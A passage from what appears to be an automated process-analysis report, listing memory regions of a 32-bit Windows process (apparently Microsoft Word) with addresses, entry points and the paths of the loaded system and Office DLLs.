(normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 305 start_va = 0x68ba0000 end_va = 0x68ba9fff entry_point = 0x68ba149a region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 306 start_va = 0x68bb0000 end_va = 0x68d07fff entry_point = 0x68bb133c region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 307 start_va = 0x68d10000 end_va = 0x68d34fff entry_point = 0x68d12b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 308 start_va = 0x68d40000 end_va = 0x68d6dfff entry_point = 0x68d416ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 309 start_va = 0x68d70000 end_va = 0x68d90fff entry_point = 0x68d7145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 310 start_va = 0x68da0000 end_va = 0x68e94fff entry_point = 0x68db0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 311 start_va = 0x68ea0000 end_va = 0x68ecefff entry_point = 0x68ea1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 312 start_va = 0x68ed0000 end_va = 0x68f20fff entry_point = 0x68ef988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 313 start_va = 0x68f30000 end_va = 0x68f5cfff entry_point = 0x68f462dc region_type = mapped_file name = "osppc.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 314 start_va = 0x68f60000 end_va = 0x68f9afff entry_point = 0x68f6128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 315 start_va = 0x68fa0000 end_va = 0x68ff9fff entry_point = 0x68fa1f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 316 start_va = 0x69000000 end_va = 0x691a1fff entry_point = 0x69001000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll") Region: id = 317 start_va = 0x691b0000 end_va = 0x69229fff entry_point = 0x691b1f48 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 318 start_va = 0x69230000 end_va = 0x6932afff entry_point = 0x692417e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 319 start_va = 0x69330000 end_va = 0x69439fff entry_point = 0x693c146c region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 320 start_va = 0x69440000 end_va = 0x6956bfff entry_point = 0x69545cf2 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 321 start_va = 0x69570000 end_va = 0x69687fff entry_point = 0x695740b1 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msptls.dll") Region: id = 322 start_va = 0x69690000 end_va = 0x69804fff entry_point = 0x69690000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 323 start_va = 0x69810000 end_va = 0x6e64efff entry_point = 0x69810000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll") Region: id = 324 start_va = 0x6e650000 end_va = 0x6ef70fff entry_point = 0x6e650000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll") Region: id = 325 start_va = 0x6ef80000 end_va = 0x6f287fff entry_point = 0x6ef80000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll") Region: id = 326 start_va = 0x6fff0000 end_va = 0x6fffffff entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 327 start_va = 0x70050000 end_va = 0x705e7fff entry_point = 0x70051000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 328 start_va = 0x705f0000 end_va = 0x70d04fff entry_point = 0x705f1000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 329 start_va = 0x70d10000 end_va = 0x71901fff entry_point = 0x70d11000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\oart.dll") Region: id = 330 start_va = 0x71910000 end_va = 0x73571fff entry_point = 0x71911000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 331 start_va = 0x73580000 end_va = 0x73582fff entry_point = 0x73580000 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 332 start_va = 0x735a0000 end_va = 0x735a4fff entry_point = 0x735a0000 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 333 start_va = 0x735b0000 end_va = 0x735b3fff entry_point = 0x735b0000 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 334 start_va = 0x735c0000 end_va = 0x735c3fff entry_point = 0x735c0000 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 335 start_va = 0x735d0000 end_va = 0x735d2fff entry_point = 0x735d0000 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 336 start_va = 0x735e0000 end_va = 0x735e3fff entry_point = 0x735e0000 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 337 start_va = 0x735f0000 end_va = 0x735f7fff entry_point = 0x735f2ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 338 start_va = 0x73600000 end_va = 0x73615fff entry_point = 0x73602dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 339 start_va = 0x73620000 end_va = 0x73669fff entry_point = 0x73622e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 340 start_va = 0x73670000 end_va = 0x73718fff entry_point = 0x73670000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 341 start_va = 0x73720000 end_va = 0x73722fff entry_point = 0x73720000 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll") Region: id = 342 start_va = 0x73730000 end_va = 0x73732fff entry_point = 0x73730000 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 343 start_va = 0x73740000 end_va = 0x73742fff entry_point = 0x73740000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 344 start_va = 0x73750000 end_va = 0x73752fff entry_point = 0x73750000 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 345 start_va = 0x73760000 end_va = 0x73762fff entry_point = 0x73760000 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll") Region: id = 346 start_va = 0x73770000 end_va = 0x73772fff entry_point = 0x73770000 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 347 start_va = 0x73780000 end_va = 0x7385bfff entry_point = 0x737ac130 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\ucrtbase.dll") Region: id = 348 start_va = 0x73860000 end_va = 0x73863fff entry_point = 0x73860000 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 349 start_va = 0x73870000 end_va = 0x73884fff entry_point = 0x7387b1a0 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\vcruntime140.dll") Region: id = 350 start_va = 0x73890000 end_va = 0x7389dfff entry_point = 0x73891235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 351 start_va = 0x738a0000 end_va = 0x738d9fff entry_point = 0x738bfab7 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 352 start_va = 0x738e0000 end_va = 0x7390bfff entry_point = 0x739001f8 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 353 start_va = 0x73910000 end_va = 0x73a9ffff entry_point = 0x739ad026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 354 start_va = 0x73aa0000 end_va = 0x73aa4fff entry_point = 0x73aa10f6 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\SysWOW64\\msimg32.dll" (normalized: "c:\\windows\\syswow64\\msimg32.dll") Region: id = 355 start_va = 0x73ab0000 end_va = 0x73abafff entry_point = 0x73ab1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 356 start_va = 0x73ac0000 end_va = 0x73ad6fff entry_point = 0x73ac1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 357 start_va = 0x73ae0000 end_va = 0x73baafff entry_point = 0x73af6a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll") Region: id = 358 start_va = 0x73bb0000 end_va = 0x73c14fff entry_point = 0x73bcfa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 359 start_va = 0x73c20000 end_va = 0x73dbdfff entry_point = 0x73c4e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 360 start_va = 0x73dc0000 end_va = 0x73f74fff entry_point = 0x73eb3d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 361 start_va = 0x73f80000 end_va = 0x73f87fff entry_point = 0x73f820f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 362 start_va = 0x73f90000 end_va = 0x73febfff entry_point = 0x73fcf798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 363 start_va = 0x73ff0000 end_va = 0x7402efff entry_point = 0x7401de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 364 start_va = 0x74030000 end_va = 0x7403ffff entry_point = 0x740338c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 365 start_va = 0x74040000 end_va = 0x74047fff entry_point = 0x740410e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 366 start_va = 0x74050000 end_va = 0x7405efff entry_point = 0x74050000 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 367 start_va = 0x74060000 end_va = 0x74088fff entry_point = 0x74066b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 368 start_va = 0x74090000 end_va = 0x7409cfff entry_point = 0x740911e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 369 start_va = 0x740a0000 end_va = 0x74159fff entry_point = 0x7410253f region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 370 start_va = 0x74160000 end_va = 0x74318fff entry_point = 0x74160000 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 371 start_va = 0x74320000 end_va = 0x7455ffff entry_point = 0x743266bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 372 start_va = 0x74560000 end_va = 0x74580fff entry_point = 0x7456c008 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 373 start_va = 0x74590000 end_va = 0x74599fff entry_point = 0x74594d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 374 start_va = 0x745a0000 end_va = 0x748a1fff entry_point = 0x745a1000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 375 start_va = 0x748b0000 end_va = 0x74a84fff entry_point = 0x748b1000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 376 start_va = 0x74a90000 end_va = 0x74a92fff entry_point = 0x74a90000 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 377 start_va = 0x74aa0000 end_va = 0x74aa2fff entry_point = 0x74aa0000 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 378 start_va = 0x74ab0000 end_va = 0x74ab2fff entry_point = 0x74ab0000 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 379 start_va = 0x74ac0000 end_va = 0x74ac2fff entry_point = 0x74ac0000 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 380 start_va = 0x74ad0000 end_va = 0x74b3cfff entry_point = 0x74b0ab20 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\msvcp140.dll") Region: id = 381 start_va = 0x74b40000 end_va = 0x74bc2fff entry_point = 0x74b513b0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 382 start_va = 0x74bd0000 end_va = 0x74c52fff entry_point = 0x74c0791c region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 383 start_va = 0x74c60000 end_va = 0x74c72fff entry_point = 0x74c61d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 384 start_va = 0x750d0000 end_va = 0x750d8fff entry_point = 0x750d1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 385 start_va = 0x752f0000 end_va = 0x752f4fff entry_point = 0x752f0000 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 386 start_va = 0x75310000 end_va = 0x7538ffff entry_point = 0x753237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 387 start_va = 0x753a0000 end_va = 0x753abfff entry_point = 0x753a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 388 start_va = 0x753b0000 end_va = 0x7540ffff entry_point = 0x753ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 389 start_va = 0x75420000 end_va = 0x754a2fff entry_point = 0x754223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 390 start_va = 0x754b0000 end_va = 0x755e5fff entry_point = 0x754b1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 391 start_va = 0x755f0000 end_va = 0x75624fff entry_point = 0x755f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 392 start_va = 0x75630000 end_va = 0x7568ffff entry_point = 0x7564158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 393 start_va = 0x75690000 end_va = 0x75695fff entry_point = 0x75691782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 394 start_va = 0x756a0000 end_va = 0x756b1fff entry_point = 0x756a1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 395 start_va = 0x756c0000 end_va = 0x757cffff entry_point = 0x756d32d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 396 start_va = 0x757d0000 end_va = 0x757e8fff entry_point = 0x757d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 397 start_va = 0x757f0000 end_va = 0x757fbfff entry_point = 0x757f238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 398 start_va = 0x75800000 end_va = 0x75845fff entry_point = 0x75807478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 399 start_va = 0x75850000 end_va = 0x75894fff entry_point = 0x758511e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 400 start_va = 0x758a0000 end_va = 0x758a4fff entry_point = 0x758a1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 401 start_va = 0x758b0000 end_va = 0x75a4cfff entry_point = 0x758b17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 402 start_va = 0x75a50000 end_va = 0x75adffff entry_point = 0x75a66343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 403 start_va = 0x75b60000 end_va = 0x75c54fff entry_point = 0x75b61865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 404 start_va = 0x75c60000 end_va = 0x75d5ffff entry_point = 0x75c7b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 405 start_va = 0x75d60000 end_va = 0x75d86fff entry_point = 0x75d658b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: 